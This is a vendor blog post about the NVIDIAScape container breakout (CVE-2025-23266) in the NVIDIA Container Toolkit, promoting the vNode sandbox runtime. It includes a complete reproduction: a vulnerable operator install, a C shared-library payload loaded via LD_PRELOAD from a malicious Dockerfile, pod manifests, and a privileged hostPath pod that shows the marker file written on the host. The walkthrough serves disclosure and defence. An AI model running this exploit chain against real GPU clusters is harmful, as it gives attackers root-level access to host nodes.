NVIDIAScape: How vNode prevents this container breakout without the need for VMs

Saiyam Pathak

July 21, 2025

6 Minute Read

Vulnerabilities happen. When Wiz researchers uncovered NVIDIAScape (CVE-2025-23266), a critical container breakout vulnerability impacting users of the NVIDIA Container Toolkit, NVIDIA acted quickly and provided a fix within versions 1.17.8 and 25.3.1 of the Container Toolkit and GPU Operator, respectively.

Let’s take a closer look at how this vulnerability worked and how we can collectively prevent similar risks in the future as AI and GPU infrastructure continue to evolve.

Many in our industry are now calling for virtual machines to be layered on top of AI infrastructure rather than running containers directly on bare-metal GPU nodes. While VMs offer very strong kernel-level isolation, they also introduce significant drawbacks, including overhead, reduced performance, and considerable complexity when running state-of-the-art drivers and when hitting the limitations of GPU passthrough.

We argue that there is a better, more container-native way to address these attack vectors, a path that does not force us to go back to virtual machines. In April 2025, we introduced vNode - a Kubernetes-native, container-based isolation technology that uniquely combines approaches such as user namespaces, seccomp filters, filesystem emulation and more to create a secure sandbox for running user-defined containers. As soon as Wiz announced NVIDIAScape, we verified that vNode protects against this vulnerability. In fact, vNode protects against any similar container breakouts. Vulnerabilities such as this one rely on running a compromised container image built from a malicious Dockerfile, and vNode was designed to protect against exactly such attacks.

In our approach to vNode, we assume that any image you run is compromised, so we designed vNode with such attack vectors in mind and made sure it protects against this entire class of vulnerabilities. Unlike the seccomp filters gVisor applies or the recently introduced user namespaces feature in Kubernetes, we don’t apply any security measures against the user-defined container itself. Instead, we run a vNode sandbox container, secure it using a plethora of security measures, and then run the user-defined container inside of it. We assume that the user-defined container can be compromised and escaped from at any time, but that means the attacker would just land in the virtual node, which is our vNode sandbox container. And the attacker will now be stuck there, in an extremely hardened, minimal container with no tooling available to them and no way to manipulate the Dockerfile, because this container is not user-defined. This protects against Dockerfile manipulations like the one in NVIDIAScape.

The remainder of this article provides the following deep dives:

Explaining in-depth how NVIDIAScape works
A step-by-step walkthrough of a successful NVIDIAScape exploit (without vNode)
A step-by-step walkthrough of a failed NVIDIAScape exploit and an in-depth explanation of how vNode protects against this attack and other similar attack vectors

1. Understanding NVIDIAScape

This section provides a technical analysis focusing on the core concepts of OCI hooks, LD_PRELOAD, and the simplicity of an NVIDIAScape exploit.

1.1 Understanding OCI Hooks and the NVIDIA Container Toolkit's Role

The Open Container Initiative (OCI) specification provides a standard for container runtimes, including a powerful "hook" system. These hooks allow external tools to execute scripts at specific points in a container's lifecycle. The NVIDIA Container Toolkit (NCT) heavily leverages these hooks to connect containerized applications to the host's NVIDIA GPUs and drivers.

Specifically, the nvidia-ctk (NVIDIA Container Toolkit) registers a createContainer hook. This hook is executed as a privileged process on the host before the container's pivot_root operation, but after its mount namespace is created. This distinction is crucial: unlike prestart hooks, createContainer hooks inherit environment variables from the container image unless explicitly configured otherwise.

Here's a snippet of how such a hook might be defined:

"createContainer": [
  {
    "path": "/usr/bin/nvidia-ctk",
    "args": ["nvidia-ctk", "hook", "enable-cuda-compat", "..."]
  },
  ...
]

This means the nvidia-ctk process, running with elevated privileges, is susceptible to environment variables set within the container's Dockerfile.
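To make the inheritance issue concrete, here is a minimal shell sketch. It does not model nvidia-ctk or any real container runtime: the function names hook_env_inherited and hook_env_clean and the fixed PATH value are hypothetical. It only prints the environment that a hook process would receive when image-supplied variables are passed through, compared with a launcher that starts from an empty environment.

```shell
#!/bin/sh
# Illustrative only: neither function runs a real OCI hook.

# Print the environment a hook would see if the variables declared by the
# image (passed here as NAME=VALUE arguments) are merged into it.
hook_env_inherited() {
    env "$@"
}

# Print the environment a hook would see if the launcher ignores the image's
# variables and starts from an empty environment with a fixed PATH
# (the PATH value is an assumption made for this sketch).
hook_env_clean() {
    env -i PATH=/usr/sbin:/usr/bin:/sbin:/bin
}
```

Running `hook_env_inherited LD_PRELOAD=./poc.so | grep LD_PRELOAD` shows the attacker-controlled value in the hook's environment, while `hook_env_clean | grep LD_PRELOAD` prints nothing.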

1.2 Technical Breakdown: How Three Lines Led to Root

At its core, NVIDIAScape exploits a critical misconfiguration in how the NVIDIA Container Toolkit (NCT) handles OCI hooks, specifically the createContainer hook.

Privileged Hook Execution: The nvidia-ctk process, which performs vital setup for GPU access, runs as a privileged host process during the createContainer hook.
Environment Variable Inheritance: Unlike other hooks, the createContainer hook inherits environment variables directly from the container image. This means a malicious container can dictate the environment of a trusted host process.
Linux Environment Variable: Attackers leverage the LD_PRELOAD Linux environment variable. By setting LD_PRELOAD to a path within the container, they force the privileged nvidia-ctk process to load and execute an arbitrary malicious shared library (.so file).
Working Directory Context: The createContainer hook executes with its working directory set to the container's root filesystem. This allows the malicious library to be referenced directly (e.g., /poc.so or /proc/self/cwd/poc.so), completing the exploit chain.
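
The working-directory point in the list above is easy to miss, so here is a small shell sketch of it. A relative path such as ./poc.so is resolved against the current directory of whichever process opens it, so the same string finds the file when that directory is the container's root filesystem and fails anywhere else. The helper resolves_from and the temporary directories are hypothetical stand-ins, not part of the toolkit.

```shell
#!/bin/sh
# resolves_from DIR PATH: succeed if PATH exists when resolved by a process
# whose working directory is DIR. The subshell body keeps the caller's
# working directory untouched.
resolves_from() (
    cd "$1" 2>/dev/null && [ -e "$2" ]
)

# Stand-in directories: one plays the container rootfs holding poc.so,
# the other plays an unrelated directory on the host.
rootfs=$(mktemp -d)
elsewhere=$(mktemp -d)
: > "$rootfs/poc.so"

if resolves_from "$rootfs" ./poc.so; then
    echo "cwd=rootfs: ./poc.so found"
fi
if ! resolves_from "$elsewhere" ./poc.so; then
    echo "cwd=elsewhere: ./poc.so not found"
fi

rm -rf "$rootfs" "$elsewhere"
```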

Let’s try to replicate this and see it in action.

2. Successful NVIDIAScape Attack without vNode

Step 1 - Create an EKS cluster

Start by creating a Kubernetes cluster with a GPU node pool. In order to simplify this we are using a single GPU node.

apiVersion: eksctl.io/v1alpha5
kind: ClusterConfig
metadata:
  name: vcluster-gpu
  region: us-east-2
  version: "1.32"
  tags:
    usage: sandbox
    owner: vcluster
vpc:
  cidr: 10.1.0.0/16
  autoAllocateIPv6: false
  hostnameType: resource-name
  clusterEndpoints:
    publicAccess: true
    privateAccess: true
managedNodeGroups:
  - name: vcluster-gpu
    amiFamily: Ubuntu2404
    desiredCapacity: 1
    instanceTypes:
      - g4dn.xlarge
    ssh:
      allow: true
      publicKeyName: vcluster

Command to create EKS cluster using eksctl

eksctl create cluster --config-file eks-config-gpu.yaml

Now fetch the kubeconfig file and export the KUBECONFIG variable:

aws eks update-kubeconfig --region us-east-2 --name vcluster-gpu --kubeconfig ./vcluster-kubeconfig
export KUBECONFIG=./vcluster-kubeconfig

Output:

kubectl get nodes
NAME                                             STATUS   ROLES    AGE   VERSION
i-067dddc81750368f4.us-east-2.compute.internal   Ready    <none>   11h   v1.32.5

Step 2 - Install a vulnerable GPU Operator

We need to make sure that the NVIDIA Container Toolkit version is <= v1.17.7:

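# Add the NVIDIA Helm repository if it is not configured yet
helm repo add nvidia https://helm.ngc.nvidia.com/nvidia
helm repo update

helm install gpu-operator nvidia/gpu-operator \
  --version=v25.3.0 \
  --namespace gpu-operator \
  --create-namespace \
  --set cdi.enabled=true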

Output:

kubectl get pods -n gpu-operator
NAME                                                          READY   STATUS      RESTARTS      AGE
gpu-feature-discovery-x8g4m                                   1/1     Running     0             11h
gpu-operator-589b499765-5zvjs                                 1/1     Running     0             11h
gpu-operator-node-feature-discovery-gc-7c7f68d5f4-z8qhj       1/1     Running     0             11h
gpu-operator-node-feature-discovery-master-58588c6967-tbc2t   1/1     Running     0             11h
gpu-operator-node-feature-discovery-worker-rsc2c              1/1     Running     0             11h
nvidia-container-toolkit-daemonset-ll7f7                      1/1     Running     0             11h
nvidia-cuda-validator-sq7vb                                   0/1     Completed   0             11h
nvidia-dcgm-exporter-f64lm                                    1/1     Running     0             11h
nvidia-device-plugin-daemonset-99hws                          1/1     Running     0             11h
nvidia-driver-daemonset-sw5fp                                 1/1     Running     3 (11h ago)   11h
nvidia-operator-validator-hwn4x                               1/1     Running     0             11h

Check the toolkit version to be sure:

kubectl exec -n gpu-operator nvidia-container-toolkit-daemonset-ll7f7 -- nvidia-ctk --version
Defaulted container "nvidia-container-toolkit-ctr" out of: nvidia-container-toolkit-ctr, driver-validation (init)
NVIDIA Container Toolkit CLI version 1.17.5
commit: f785e908a7f72149f8912617058644fd84e38cde

As you can see, the version is 1.17.5, which is vulnerable.
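
If you want to script this check, the following is a minimal sketch in POSIX shell. It assumes, as stated above, that every release up to and including 1.17.7 is affected and that 1.17.8 is the first fixed release; the function name toolkit_is_vulnerable is hypothetical, and the function expects a well-formed MAJOR.MINOR.PATCH string.

```shell
#!/bin/sh
# toolkit_is_vulnerable VERSION
# Succeeds (exit status 0) when VERSION is older than 1.17.8, the first fixed
# NVIDIA Container Toolkit release named in this article.
# Note: plain POSIX sh has no local variables, so the helper variables below
# are global.
toolkit_is_vulnerable() {
    v=${1#v}                    # tolerate a leading "v"
    old_ifs=$IFS
    IFS=.
    set -- $v                   # split MAJOR.MINOR.PATCH on dots
    IFS=$old_ifs
    major=${1:-0}
    minor=${2:-0}
    patch=${3:-0}
    patch=${patch%%[!0-9]*}     # drop suffixes such as "-rc"
    patch=${patch:-0}

    [ "$major" -lt 1 ] && return 0
    [ "$major" -gt 1 ] && return 1
    [ "$minor" -lt 17 ] && return 0
    [ "$minor" -gt 17 ] && return 1
    [ "$patch" -lt 8 ]
}
```

For the version reported above, `toolkit_is_vulnerable 1.17.5 && echo "upgrade needed"` prints the message, while the same call with 1.17.8 prints nothing.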

Step 3 - Create a poc.c file

Start with the following:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

__attribute__((constructor))
void init() {
    // Ultra-minimal exploit - just create a marker file
    int fd = open("/owned", O_CREAT | O_WRONLY, 0644);
    if (fd >= 0) {
        write(fd, "EXPLOITED\n", 10);
        close(fd);
    }
}

This code is a minimal C exploit designed to demonstrate unauthorized code execution triggered from a container image. It includes the standard C headers for input/output, memory management, POSIX system calls, and file control. The special __attribute__((constructor)) before the init function ensures that this function is executed automatically when the shared object or binary is loaded, before main() is even called.

Inside init, the code tries to create (or open if it already exists) a file named /owned at the root of the filesystem, with write permissions. If successful, it writes the text “EXPLOITED” into this file and then closes it. The presence of this /owned file with the “EXPLOITED” message serves as a marker, signaling that the exploit was successfully executed and the attacker managed to run code on the host (or outside the intended sandbox). This is a classic technique used for quickly verifying privilege escalation or container breakout scenarios.

Step 4 - Compile for AMD64 architecture

docker run --platform linux/amd64 --rm -v "$(pwd)":/work -w /work ubuntu:20.04 bash -c "apt-get update && apt-get install -y gcc && gcc -shared -fPIC -o poc.so poc.c"

Step 5 - Create malicious Dockerfile and build the container

FROM ubuntu:20.04
ENV LD_PRELOAD=./poc.so
COPY poc.so .
CMD ["sleep", "3600"]
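
Because the whole attack hinges on one ENV line, a quick review-time check for it can be sketched in shell. This is a heuristic only, not a defence: it misses ENV instructions continued with a backslash, variables inherited from a base image, and values set in the pod spec instead of the image. The function name dockerfile_sets_ld_preload is hypothetical.

```shell
#!/bin/sh
# dockerfile_sets_ld_preload FILE
# Succeeds when FILE contains an ENV instruction that assigns LD_PRELOAD,
# in either the "ENV NAME=value" or the legacy "ENV NAME value" form.
# Commented-out lines and variables that merely end in LD_PRELOAD
# (for example MY_LD_PRELOAD) are not reported.
dockerfile_sets_ld_preload() {
    grep -Eq '^[[:space:]]*[Ee][Nn][Vv][[:space:]]+(.*[[:space:]])?LD_PRELOAD([=[:space:]]|$)' "$1"
}
```

A call such as `dockerfile_sets_ld_preload Dockerfile && echo "LD_PRELOAD is set in this image"` flags the Dockerfile shown above.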

Build the container image and push to repo: you can use your own registry or ttl.sh

Command:

docker buildx build --platform linux/amd64 -t saiyam911/nvidia-escape-exploit:v1 --push .

Output:

[+] Building 4.8s (8/8) FINISHED docker-container:quizzical_shockley
 => [internal] load build definition from Dockerfile 0.0s
 => => transferring dockerfile: 162B 0.0s
 => [internal] load metadata for docker.io/library/ubuntu:20.04 0.3s
 => [internal] load .dockerignore 0.0s
 => => transferring context: 2B 0.0s
 => [internal] load build context 0.0s
 => => transferring context: 93B 0.0s
 => [1/2] FROM docker.io/library/ubuntu:20.04@sha256:8feb4d8ca5354def3d8fce243717141ce31e2 0.0s
 => => resolve docker.io/library/ubuntu:20.04@sha256:8feb4d8ca5354def3d8fce243717141ce31e2 0.0s
 => CACHED [2/2] ADD poc.so / 0.0s
 => exporting to image 4.4s
 => => exporting layers 0.0s
 => => exporting manifest sha256:7ac4ecf11489c030dbff703e993df1f2aa46bd847c1aacd635202425c 0.0s
 => => exporting config sha256:fdc6e68597444abd53892ca85f94d50894a033c79bf6adb203ac925d8af 0.0s
 => => exporting attestation manifest sha256:1bdbe0421380fd5ce88d74d4ff8accc4459f96ade487b 0.0s
 => => exporting manifest list sha256:8ce66a62f8f03de4ab786f3fe32b76b36c366f460c0e74b92a4c 0.0s
 => => pushing layers 2.5s
 => => pushing manifest for docker.io/saiyam911/nvidia-escape-exploit:v1@sha256:8ce66a62f8 1.9s
 => [auth] saiyam911/nvidia-escape-exploit:pull,push token for registry-1.docker.io 0.0s

Step 6 - Deploy the malicious pod requesting GPU resources

Create a file malicious-pod.yaml

apiVersion: v1
kind: Pod
metadata:
  name: nvidia-escape-exploit
spec:
  containers:
    - name: exploit-container
      image: saiyam911/nvidia-escape-exploit:v1
      resources:
        limits:
          nvidia.com/gpu: 1
      env:
        - name: LD_PRELOAD
          value: "./poc.so"

Command:

kubectl apply -f malicious-pod.yaml

Output:

demo ~ kubectl apply -f malicious-pod.yaml
pod/nvidia-escape-exploit created
demo ~ kubectl get pods
NAME                    READY   STATUS    RESTARTS   AGE
nvidia-escape-exploit   1/1     Running   0          11s

Step 7 - Create a privileged pod and check if the file was created.

Create a file host-check-pod.yaml

apiVersion: v1
kind: Pod
metadata:
  name: host-checker
  namespace: default
spec:
  restartPolicy: Never
  hostNetwork: true
  hostPID: true
  containers:
    - name: checker
      image: ubuntu:20.04
      securityContext:
        privileged: true
      volumeMounts:
        - name: host-root
          mountPath: /host
      command: ["sleep", "3600"]
  volumes:
    - name: host-root
      hostPath:
        path: /

Command:

kubectl apply -f host-check-pod.yaml

Output:

kubectl apply -f host-check-pod.yaml

pod/host-checker created

Check the file created

demo ~ kubectl exec host-checker -- ls /host/owned
/host/owned
demo ~ kubectl exec host-checker -- cat /host/owned
EXPLOITED

This confirms the exploit: the marker file was created on the host machine, outside the container.

3. Defeating Container Breakouts with vNode

vNode is a multi-tenancy container runtime that provides strong isolation between workloads using Linux user namespaces and seccomp filters. It runs in Kubernetes environments and supports privileged workloads such as Docker-in-Docker and Kubernetes-in-Kubernetes. vNode ensures every container runs as a non-root user inside a sandbox.

Let’s try to understand that visually.

We have already seen what happens without vNode and how the malicious pod is able to create /owned files on the GPU host.

As you can see, with vNode the exploit and the container breakout still happen, but on the virtual node, not on the actual GPU node.

Let’s see this in action: we will install the vNode runtime and then rerun the same malicious pod with vnode as its runtime class.

To install the vNode runtime, you need a platform host and a platform access key. You can easily get both using vcluster.cloud.

helm upgrade --install vnode-runtime vnode-runtime -n vnode-runtime \
  --repo https://charts.loft.sh \
  --create-namespace \
  --set "config.platform.host=$PLATFORM_HOST" \
  --set "config.platform.accessKey=$PLATFORM_ACCESS_KEY" \
  --set config.platform.insecure=true

Now you will have a vNode specific runtime class.

kubectl get runtimeclass
NAME             HANDLER          AGE
nvidia           nvidia           16h
nvidia-cdi       nvidia-cdi       13h
nvidia-legacy    nvidia-legacy    13h
vnode            vnode            28h
vnode-launcher   vnode-launcher   28h
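
Before applying a pod that references the runtime class, it can help to confirm that the class is actually registered. The sketch below is one way to do that in shell by parsing the table printed above; the function name has_runtimeclass is hypothetical, and it assumes the default output with a header row (so it should not be fed output produced with --no-headers).

```shell
#!/bin/sh
# has_runtimeclass NAME
# Reads `kubectl get runtimeclass` output on stdin and succeeds when a row
# whose first column equals NAME is present. The header row is skipped.
has_runtimeclass() {
    awk -v want="$1" 'NR > 1 && $1 == want { found = 1 } END { exit !found }'
}
```

For example, `kubectl get runtimeclass | has_runtimeclass vnode && echo "vnode runtime class is available"`.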

Create a pod with vnode Runtime class

We will use the same pod and just add the vNode runtime class (first remove the /owned file from the GPU instance manually).

Create a file malicious-pod-vnode.yaml

apiVersion: v1
kind: Pod
metadata:
  name: nvidia-escape-exploit-protected
  namespace: default
spec:
  restartPolicy: Never
  runtimeClassName: vnode
  containers:
    - name: exploit-container
      image: saiyam911/nvidia-escape-exploit:v1
      imagePullPolicy: Always
      resources:
        limits:
          nvidia.com/gpu: 1
        requests:
          nvidia.com/gpu: 1

Output:

demo ~ kubectl apply -f malicious-pod-vnode.yaml
pod/nvidia-escape-exploit-protected created
demo ~ kubectl get pods
NAME                              READY   STATUS      RESTARTS   AGE
host-checker                      1/1     Running     0          40m
nvidia-escape-exploit             0/1     Completed   0          43m
nvidia-escape-exploit-protected   1/1     Running     0          14s

Now create the host-checker pod again, and you won’t find any /owned file created on the host.

Next, create the host-checker pod with the vNode runtime class:

File - vnode-privileged.yaml

apiVersion: v1
kind: Pod
metadata:
  name: vnode-host-checker
  namespace: default
spec:
  restartPolicy: Never
  runtimeClassName: vnode
  hostNetwork: true
  hostPID: true
  containers:
    - name: checker
      image: ubuntu:20.04
      securityContext:
        privileged: true
      volumeMounts:
        - name: host-root
          mountPath: /host
      command: ["sleep", "3600"]
  volumes:
    - name: host-root
      hostPath:
        path: /

Output:

demo ~ kubectl apply -f vnode-privileged.yaml
pod/vnode-host-checker created
demo ~ kubectl get pods
NAME                              READY   STATUS      RESTARTS   AGE
host-checker                      1/1     Running     0          87s
nvidia-escape-exploit             0/1     Completed   0          46m
nvidia-escape-exploit-protected   1/1     Running     0          3m32s
vnode-host-checker                1/1     Running     0          5s
demo ~ kubectl exec -it vnode-host-checker -- cat /host/owned
EXPLOITED

As you can see, the attack succeeded, but only at the virtual node level; it cannot affect or access the host node. vNode successfully prevented the malicious attack from reaching the host.

Conclusion

NVIDIAScape is just one critical vulnerability that leads to a container breakout. It is far from the first such attack, and it won’t be the last. A radical answer is to layer in VMs for everything, even though their drawbacks are clear in high-performance environments. An equally undesirable option is the reactive strategy of patching systems after vulnerabilities are identified; in the case of NVIDIAScape, you can upgrade the NVIDIA Container Toolkit to version 1.17.8, which contains the fix.

However, to keep your workloads protected inside a safe environment, vNode provides a third alternative that is more container-native than virtual machines and more proactive than trying to patch systems fast enough. vNode provides a lightweight virtual node layer that automatically creates a runtime class in your Kubernetes cluster. Using this vNode runtime allows you to wrap Kubernetes workloads in secure sandboxes, and if a container breakout does occur, or even if a privileged pod is used, the attack is contained within this virtual node and never reaches the actual host.

Are you affected by this vulnerability or want to protect against similar attacks in the future? Talk to us! We’re happy to evaluate your environment and help you run a POC with vNode to see how easy it can be to get additional guards up for your AI infrastructure.
